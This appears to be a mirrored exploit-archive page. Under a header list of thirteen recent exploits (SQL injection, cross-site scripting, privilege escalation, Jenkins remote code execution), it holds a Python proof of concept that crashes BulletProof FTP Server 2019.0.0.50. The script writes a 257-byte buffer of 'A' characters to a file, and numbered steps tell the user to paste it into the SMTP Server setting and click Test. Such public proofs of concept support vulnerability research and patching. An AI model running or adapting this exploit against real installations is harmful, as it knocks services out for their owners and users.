
13 changes to exploits/shellcodes NetSetMan 4.7.1 - 'Workgroup' Denial of Service (PoC) Valentina Studio 9.0.4 - 'Host' Denial of Service (PoC) BulletProof FTP Server 2019.0.0.50 - 'SMTP Server' Denial of Service (PoC) MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - File Permissions SYSTEM Privilege Escalation Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection Listing Hub CMS 1.0 - 'pages.php id' SQL Injection Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-Site Scripting eDirectory - SQL Injection XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection Jenkins - Remote Code Execution
22 lines
No EOL
723 B
Python
Executable file
22 lines
No EOL
723 B
Python
Executable file
#Exploit Title: BulletProof FTP Server 2019.0.0.50 - Denial of Service (PoC)
|
|
#Discovery by: Victor Mondragón
|
|
#Discovery Date: 2018-02-19
|
|
#Vendor Homepage: http://bpftpserver.com/
|
|
#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download
|
|
#Tested Version: 2019.0.0.50
|
|
#Tested on: Windows 7 x64 Service Pack 1
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: BulletProof_FTP_Server_2019.0.0.50.py
|
|
#2.- Open bullet.txt and copy content to clipboard
|
|
#3.- Open BulletProof FTP Server
|
|
#4.- Select "Settings" > "SMTP"
|
|
#5.- In "Email Server" select "SMTP Server" and Paste Clipboard
|
|
#6.- Click on "Test"
|
|
#7.- Crashed
|
|
|
|
cod = "\x41" * 257
|
|
|
|
f = open('bullet.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |